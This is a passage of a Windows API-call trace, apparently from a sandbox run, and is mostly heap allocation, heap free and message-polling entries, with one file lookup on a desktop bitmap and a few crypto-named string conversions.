(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0200.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0200.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0200.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0200.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b28 [0200.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0200.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0200.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0200.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e53920 [0200.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0200.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0200.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0200.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0200.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0200.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0200.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0200.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0200.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0200.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0200.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0200.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0200.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0200.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0200.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0200.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0200.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0200.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0200.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0200.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0200.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0200.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0200.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0200.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0200.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0200.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0200.337] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0200.337] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0200.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0200.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0200.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0200.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0200.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0200.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0200.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0200.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0200.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0200.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0200.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0200.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0200.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0200.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0200.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0200.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0200.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0200.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0200.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0200.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0200.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0200.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0200.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0200.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0200.379] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0200.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0200.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0200.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0200.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0200.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0200.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0200.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0200.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0200.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0200.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0200.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0200.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0200.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0200.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0200.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0200.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0200.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0200.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0200.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0200.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0200.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0200.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0200.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0200.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0200.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0200.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0200.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0200.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0200.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0200.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0200.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0200.380] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0200.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0200.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0200.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0200.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0200.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0200.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0200.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0200.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0200.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0200.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0200.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0200.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0200.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0200.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0200.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0200.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0200.381] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0200.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0200.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0200.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0200.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0200.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0200.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0200.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0200.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0200.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0200.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0200.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0200.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0200.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0200.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0200.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0200.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0200.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0200.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0200.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0200.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0200.382] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/P52g8.bmp", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd23700b0, ftCreationTime.dwHighDateTime=0x1d5e434, ftLastAccessTime.dwLowDateTime=0x27023710, ftLastAccessTime.dwHighDateTime=0x1d5e208, ftLastWriteTime.dwLowDateTime=0x27023710, ftLastWriteTime.dwHighDateTime=0x1d5e208, nFileSizeHigh=0x0, nFileSizeLow=0x14227, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="P52g8.bmp", cAlternateFileName="")) returned 0xa87250 [0200.383] FindClose (in: hFindFile=0xa87250 | out: hFindFile=0xa87250) returned 1 [0200.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0200.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0200.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0200.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0200.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0200.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0200.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0200.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0200.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0200.383] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0200.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0200.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0200.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0200.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0200.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0200.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0200.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0200.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0200.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0200.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0200.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0200.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0200.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0200.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0200.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0200.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0200.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0200.384] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0200.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0200.384] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0200.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0200.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0200.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50590 [0200.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0200.384] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0200.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc00 [0200.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0200.384] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0200.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc00 | out: hHeap=0x970000) returned 1 [0200.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0200.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0200.385] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0200.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0200.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0200.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0200.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0200.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0200.385] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0200.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0200.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0200.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0200.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0200.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0200.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0200.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0200.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0200.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0200.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0200.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0200.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0200.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0200.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0200.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0200.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0200.386] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0200.386] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe68 [0200.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0200.386] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0200.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0200.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b68 [0200.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0200.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0200.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0200.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50650 [0200.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0200.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0200.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0200.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0200.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0200.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0200.386] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0200.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0200.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0200.387] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0200.387] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0200.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0200.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0200.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0200.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0200.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0200.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0200.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0200.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0200.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0200.387] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0200.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0200.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0200.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0200.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0200.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0200.387] RtlAllocateHeap 